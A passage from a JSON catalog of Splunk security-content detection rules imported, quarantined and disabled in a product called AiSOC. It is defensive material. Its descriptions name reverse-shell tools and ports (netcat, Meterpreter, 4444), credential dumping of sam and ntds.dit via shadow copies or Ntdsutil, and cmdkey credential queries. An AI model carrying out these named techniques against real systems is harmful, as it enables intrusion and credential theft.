"https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_identify_powershell_web_access_iis_pool.yml" } }, { "id": "splunk-security-content-d85c05c8-42c0-4e4a-87e7-4e1bb3e844e3", "type": "detection", "name": "Cisco Secure Firewall - Communication Over Suspicious Ports", "description": "The following analytic detects potential reverse shell activity by identifying connections involving ports commonly associated with remote access tools, shell listeners, or tunneling utilities. It leverages Cisco Secure Firewall Threat Defense logs and monitors destination ports against a list of non-standard, high-risk port values often used in post-exploitation scenarios. Adversaries frequently configure tools like netcat, Meterpreter, or other backdoors to listen or connect over uncommon ports such as 4444, 2222, or 51820 to bypass standard monitoring and firewall rules. If confirmed malicious, this activity may represent command and control (C2) tunneling, lateral movement, or unauthorized remote access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021", "T1055", "T1059.001", "T1105", "T1219", "T1571" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-communication-over-suspicious-ports.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d85c05c8-42c0-4e4a-87e7-4e1bb3e844e3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___communication_over_suspicious_ports.yml" } }, { "id": "splunk-security-content-d8b967dd-657f-4d88-93b5-c588bcd7218c", "type": "detection", "name": "Okta Risk Threshold Exceeded", "description": "The following correlation identifies when a user exceeds a risk threshold based on multiple suspicious Okta activities. It leverages the Risk Framework from Enterprise Security, aggregating risk events from \"Suspicious Okta Activity,\" \"Okta Account Takeover,\" and \"Okta MFA Exhaustion\" analytic stories. This detection is significant as it highlights potentially compromised user accounts exhibiting multiple tactics, techniques, and procedures (TTPs) within a 24-hour period. If confirmed malicious, this activity could indicate a serious security breach, allowing attackers to gain unauthorized access, escalate privileges, or persist within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078", "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-risk-threshold-exceeded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d8b967dd-657f-4d88-93b5-c588bcd7218c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_risk_threshold_exceeded.yml" } }, { "id": "splunk-security-content-d8bea5ca-9d4a-4249-8b56-64a619109835", "type": "detection", "name": "Windows Processes Killed By Industroyer2 Malware", "description": "The following analytic detects the termination of specific processes by the Industroyer2 malware. It leverages Sysmon EventCode 5 to identify when processes like \"PServiceControl.exe\" and \"PService_PPD.exe\" are killed. This activity is significant as it targets processes related to energy facility networks, indicating a potential attack on critical infrastructure. If confirmed malicious, this could lead to disruption of essential services, loss of control over energy systems, and significant operational impact. Immediate investigation is required to determine the cause and mitigate any potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-processes-killed-by-industroyer2-malware.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d8bea5ca-9d4a-4249-8b56-64a619109835", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_processes_killed_by_industroyer2_malware.yml" } }, { "id": "splunk-security-content-d8c406fe-23d2-45f3-a983-1abe7b83ff3b", "type": "detection", "name": "Credential Dumping via Copy Command from Shadow Copy", "description": "The following analytic detects the use of the copy command to dump credentials from a shadow copy. It leverages Endpoint Detection and Response (EDR) data to identify processes with command lines referencing critical files like \"sam\", \"security\", \"system\", and \"ntds.dit\" in system directories. This activity is significant as it indicates an attempt to extract credentials, a common technique for unauthorized access and privilege escalation. If confirmed malicious, this could lead to attackers gaining sensitive login information, escalating privileges, moving laterally within the network, or accessing sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/credential-dumping-via-copy-command-from-shadow-copy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d8c406fe-23d2-45f3-a983-1abe7b83ff3b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/credential_dumping_via_copy_command_from_shadow_copy.yml" } }, { "id": "splunk-security-content-d8c972eb-ed84-431a-8869-ca4bd83257d1", "type": "detection", "name": "Windows PowerShell Get CIMInstance Remote Computer", "description": "The following analytic detects the use of the Get-CimInstance cmdlet with the -ComputerName parameter, indicating an attempt to retrieve information from a remote computer. It leverages PowerShell Script Block Logging to identify this specific command execution. This activity is significant as it may indicate unauthorized remote access or information gathering by an attacker. If confirmed malicious, this could allow the attacker to collect sensitive data from remote systems, potentially leading to further exploitation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-get-ciminstance-remote-computer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d8c972eb-ed84-431a-8869-ca4bd83257d1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_get_ciminstance_remote_computer.yml" } }, { "id": "splunk-security-content-d8ddfa9b-b724-4df9-9dbe-f34cc0936714", "type": "detection", "name": "Windows Export Certificate", "description": "The following analytic detects the export of a certificate from the Windows Certificate Store. It leverages the Certificates Lifecycle log channel, specifically event ID 1007, to identify this activity. Monitoring certificate exports is crucial as certificates can be used for authentication to VPNs or private resources. If malicious actors export certificates, they could potentially gain unauthorized access to sensitive systems or data, leading to significant security breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.004", "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-export-certificate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d8ddfa9b-b724-4df9-9dbe-f34cc0936714", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_export_certificate.yml" } }, { "id": "splunk-security-content-d92f2d95-05fb-48a7-910f-4d3d61ab8655", "type": "detection", "name": "Windows Administrative Shares Accessed On Multiple Hosts", "description": "The following analytic detects a source computer accessing Windows administrative shares (C$, Admin$, IPC$) on 30 or more remote endpoints within a 5-minute window. It leverages Event IDs 5140 and 5145 from file share events. This behavior is significant as it may indicate an adversary enumerating network shares to locate sensitive files, a common tactic used by threat actors. If confirmed malicious, this activity could lead to unauthorized access to critical data, lateral movement, and potential compromise of multiple systems within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1135" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-administrative-shares-accessed-on-multiple-hosts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d92f2d95-05fb-48a7-910f-4d3d61ab8655", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_administrative_shares_accessed_on_multiple_hosts.yml" } }, { "id": "splunk-security-content-d9eb7cda-5622-4722-bc88-7f2442f4b5af", "type": "detection", "name": "Windows Sensitive Group Discovery With Net", "description": "The following analytic detects the execution of `net.exe` with command-line arguments used to query elevated domain or sensitive groups. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it indicates potential reconnaissance efforts by adversaries to identify high-privileged users within Active Directory. If confirmed malicious, this behavior could lead to further attacks aimed at compromising privileged accounts, escalating privileges, or gaining unauthorized access to sensitive systems and data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sensitive-group-discovery-with-net.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d9eb7cda-5622-4722-bc88-7f2442f4b5af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_sensitive_group_discovery_with_net.yml" } }, { "id": "splunk-security-content-da20828e-d6fb-4ee5-afb7-d0ac200923d5", "type": "detection", "name": "GCP Multiple Users Failing To Authenticate From Ip", "description": "The following analytic detects a single source IP address failing to authenticate into more than 20 unique Google Workspace user accounts within a 5-minute window. It leverages Google Workspace login failure events to identify potential password spraying attacks. This activity is significant as it may indicate an adversary attempting to gain unauthorized access or elevate privileges within the Google Cloud Platform. If confirmed malicious, this behavior could lead to unauthorized access to sensitive resources, data breaches, or further exploitation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003", "T1110.004", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gcp-multiple-users-failing-to-authenticate-from-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "da20828e-d6fb-4ee5-afb7-d0ac200923d5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gcp_multiple_users_failing_to_authenticate_from_ip.yml" } }, { "id": "splunk-security-content-da355155-1d23-48f9-bf95-e534ae273ab0", "type": "detection", "name": "Windows Chrome Enable Extension Loading via Command-Line", "description": "The following analytic detects instances where Google Chrome is started with the --disable-features=DisableLoadExtensionCommandLineSwitch flag, effectively enabling the loading of extensions via the command line.\nThis may indicate attempts to bypass enterprise extension policies, load unauthorized or malicious extensions, or manipulate browser behavior.\nMonitoring this activity helps identify potential security policy violations, malware persistence techniques, or other suspicious Chrome modifications.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1185" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-chrome-enable-extension-loading-via-command-line.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "da355155-1d23-48f9-bf95-e534ae273ab0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_chrome_enable_extension_loading_via_command_line.yml" } }, { "id": "splunk-security-content-da63bc76-61ae-11eb-ae93-0242ac130002", "type": "detection", "name": "Ntdsutil Export NTDS", "description": "The following analytic detects the use of Ntdsutil to export the Active Directory database (NTDS.dit). It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant because exporting NTDS.dit can be a precursor to offline password cracking, posing a severe security risk. If confirmed malicious, an attacker could gain access to sensitive credentials, potentially leading to unauthorized access and privilege escalation within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ntdsutil-export-ntds.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "da63bc76-61ae-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/ntdsutil_export_ntds.yml" } }, { "id": "splunk-security-content-dac279bc-9202-11eb-b7fb-acde48001122", "type": "detection", "name": "Disabling Task Manager", "description": "The following analytic identifies modifications to the Windows registry that disable Task Manager. It leverages data from the Endpoint.Registry data model, specifically looking for changes to the registry path \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableTaskMgr\" with a value of \"0x00000001\". This activity is significant as it is commonly associated with malware such as RATs, Trojans, and worms, which disable Task Manager to prevent users from terminating malicious processes. If confirmed malicious, this could allow attackers to maintain persistence and control over the infected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disabling-task-manager.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dac279bc-9202-11eb-b7fb-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disabling_task_manager.yml" } }, { "id": "splunk-security-content-daed6823-b51c-4843-a6ad-169708f1323e", "type": "detection", "name": "Windows Service Deletion In Registry", "description": "The following analytic detects the deletion of a service from the Windows Registry under CurrentControlSet\\Services. It leverages data from the Endpoint.Registry datamodel, specifically monitoring registry paths and actions related to service deletion. This activity is significant as adversaries may delete services to evade detection and hinder incident response efforts. If confirmed malicious, this action could disrupt legitimate services, impair system functionality, and potentially allow attackers to maintain a lower profile within the environment, complicating detection and remediation efforts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-service-deletion-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "daed6823-b51c-4843-a6ad-169708f1323e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_service_deletion_in_registry.yml" } }, { "id": "splunk-security-content-db02d6b4-5d5b-4c33-8d8f-f0577516a8c7", "type": "detection", "name": "Windows Credentials from Password Stores Query", "description": "The following analytic detects the execution of the Windows OS tool cmdkey.exe, which is often abused by post-exploitation tools like winpeas, commonly used in ransomware attacks to list stored usernames, passwords, or credentials. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs. This activity is significant as it indicates potential credential harvesting, which can lead to privilege escalation and persistence. If confirmed malicious, attackers could gain unauthorized access to sensitive information and maintain control over compromised systems for further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-credentials-from-password-stores-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "db02d6b4-5d5b-4c33-8d8f-f0577516a8c7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_credentials_from_password_stores_query.yml" } }, { "id": "splunk-security-content-db435700-4ddc-4c23-892e-49e7525d7d39", "type": "detection", "name": "O365 Privileged Role Assigned", "description": "The following analytic identifies the assignment of sensitive and privileged Azure Active Directory roles to an Azure AD user. Adversaries and red teams alike may assign these roles to a compromised account to establish Persistence in an Azure AD environment. This detection leverages the O365 Universal Audit Log data source.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-privileged-role-assigned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "db435700-4ddc-4c23-892e-49e7525d7d39", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_privileged_role_assigned.yml" } }, { "id": "splunk-security-content-db596056-3019-11ec-a9ff-acde48001122", "type": "detection", "name": "Disable Schedule Task", "description": "The following analytic detects the execution of a command to disable an existing scheduled task using 'schtasks.exe' with the '/change' and '/disable' parameters. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. Disabling scheduled tasks is significant as it is a common tactic used by adversaries, including malware like IcedID, to disable security applications and evade detection. If confirmed malicious, this activity could allow attackers to persist undetected, disable critical security defenses, and further compromise the targeted host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-schedule-task.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "db596056-3019-11ec-a9ff-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_schedule_task.yml" } }, { "id": "splunk-security-content-dbbbe26f-83fe-4ee3-8b77-ccf7fbd416c8", "type": "detection", "name": "ESXi Encryption Settings Modified", "description": "Detects the disabling of critical encryption enforcement settings on an ESXi host, such as secure boot or executable verification requirements, which may indicate an attempt to weaken hypervisor integrity or allow unauthorized code execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-encryption-settings-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dbbbe26f-83fe-4ee3-8b77-ccf7fbd416c8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_encryption_settings_modified.yml" } }, { "id": "splunk-security-content-dbdd251e-dd45-4ec9-a555-f5e151391746", "type": "detection", "name": "Windows Office Product Dropped Cab or Inf File", "description": "The following analytic detects Office products writing .cab or .inf files, indicative of CVE-2021-40444 exploitation. It leverages the Endpoint.Processes and Endpoint.Filesystem data models to identify Office applications creating these file types. This activity is significant as it may signal an attempt to load malicious ActiveX controls and download remote payloads, a known attack vector. If confirmed malicious, this could lead to remote code execution, allowing attackers to gain control over the affected system and potentially compromise sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-office-product-dropped-cab-or-inf-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dbdd251e-dd45-4ec9-a555-f5e151391746", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_office_product_dropped_cab_or_inf_file.yml" } }, { "id": "splunk-security-content-dbdd556d-9da8-4c42-9980-8a3ffe25a758", "type": "detection", "name": "Windows File Collection Via Copy Utilities", "description": "The following analytic detects the use of Windows command-line copy utilities, such as xcopy, to systematically collect files from user directories and consolidate them into a centralized location on the system. This activity is often indicative of malicious behavior, as threat actors frequently use such commands to gather sensitive information, including documents with .doc, .docx, and .pdf extensions. The detection focuses on identifying recursive copy operations targeting user folders, such as Documents, Desktop, or other directories that commonly store personal or organizational files. Malware that performs this behavior typically attempts to evade detection by using legitimate Windows utilities, executing commands through cmd.exe or other scripting hosts, and writing the collected files to directories like C:\\ProgramData or temporary storage locations. Once collected, the information may be staged for exfiltration, used for lateral movement, or leveraged for further compromise of the environment. By monitoring for these types of file collection patterns, security teams can identify suspicious activity early, differentiate between normal administrative tasks and potentially malicious scripts, and prevent sensitive data from being exfiltrated. This analytic is particularly relevant for environments where confidential documents are present and attackers may attempt to harvest them using built-in Windows tools.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1119" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-file-collection-via-copy-utilities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dbdd556d-9da8-4c42-9980-8a3ffe25a758", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_file_collection_via_copy_utilities.yml" } }, { "id": "splunk-security-content-dbfca1dd-b8e5-4ba4-be0e-e565e5d62002", "type": "detection", "name": "Amazon EKS Kubernetes Pod scan detection", "description": "The following analytic detects unauthenticated requests made against the Kubernetes Pods API, indicating potential unauthorized access attempts. It leverages the `aws_cloudwatchlogs_eks` data source, filtering for events where `user.username` is \"system:anonymous\", `verb` is \"list\", and `objectRef.resource` is \"pods\", with `requestURI` set to \"/api/v1/pods\". This activity is significant as it may signal attempts to access sensitive resources or execute unauthorized commands within the Kubernetes environment. If confirmed malicious, such access could lead to data compromise, unauthorized command execution, or lateral movement within the cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1526" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/amazon-eks-kubernetes-pod-scan-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dbfca1dd-b8e5-4ba4-be0e-e565e5d62002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/amazon_eks_kubernetes_pod_scan_detection.yml" } }, { "id": "splunk-security-content-dc02c0ee-6ac0-4c7f-87ba-8ce43a4e4418", "type": "detection", "name": "Azure AD Tenant Wide Admin Consent Granted", "description": "The following analytic identifies instances where admin consent is granted to an application within an Azure AD tenant. It leverages Azure AD audit logs, specifically events related to the admin consent action within the ApplicationManagement category. This activity is significant because admin consent allows applications to access data across the entire tenant, potentially exposing vast amounts of organizational data. If confirmed malicious, an attacker could gain extensive and persistent access to sensitive data, leading to data exfiltration, espionage, further malicious activities, and potential compliance violations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-tenant-wide-admin-consent-granted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dc02c0ee-6ac0-4c7f-87ba-8ce43a4e4418", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_tenant_wide_admin_consent_granted.yml" } }, { "id": "splunk-security-content-dc1457d0-1d9b-422e-b5a7-db46c184d9aa", "type": "detection", "name": "Network Share Discovery Via Dir Command", "description": "The following analytic detects access to Windows administrative SMB shares (Admin$, IPC$, C$) using the 'dir' command. It leverages Windows Security Event Logs with EventCode 5140 to identify this activity. This behavior is significant as it is commonly used by tools like PsExec/PaExec for staging binaries before creating and starting services on remote endpoints, a technique often employed by adversaries for lateral movement and remote code execution. If confirmed malicious, this activity could allow attackers to propagate malware, such as IcedID, across the network, leading to widespread infection and potential data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1135" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/network-share-discovery-via-dir-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dc1457d0-1d9b-422e-b5a7-db46c184d9aa", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/network_share_discovery_via_dir_command.yml" } }, { "id": "splunk-security-content-dc167f8b-3f9d-4460-9c98-8b6e703fd628", "type": "detection", "name": "Windows EventLog Recon Activity Using Log Query Utilities", "description": "This analytic detects EventLog reconnaissance activity using utilities such as `wevtutil.exe`, `wmic.exe`, PowerShell cmdlets like `Get-WinEvent`, or WMI queries targeting `Win32_NTLogEvent`. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. These tools are often used by adversaries to extract usernames, IP addresses, session data, and event information for credential access or situational awareness during lateral movement. While these utilities are legitimate, execution with specific arguments or targeting sensitive logs like `Security`, `PowerShell`, or specific EventIDs (e.g., 4624, 4778) can indicate malicious intent. If confirmed malicious, this behavior could allow an attacker to extract sensitive info and potentially have leveraged access or move laterally.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1654" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-eventlog-recon-activity-using-log-query-utilities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dc167f8b-3f9d-4460-9c98-8b6e703fd628", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_eventlog_recon_activity_using_log_query_utilities.yml" } }, { "id": "splunk-security-content-dc2f58bc-8cd2-4e51-962a-694b963acde0", "type": "detection", "name": "Windows AD Privileged Object Access Activity", "description": "The following analytic detects access attempts to privileged Active Directory objects, such as Domain Admins or Enterprise Admins. It leverages Windows Security Event Code 4662 to identify when these sensitive objects are accessed. This activity is significant because such objects should rarely be accessed by normal users or processes, and unauthorized access attempts may indicate attacker enumeration or lateral movement within the domain. If confirmed malicious, this activity could allow attackers to escalate privileges, persist in the environment, or gain control over critical domain resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": 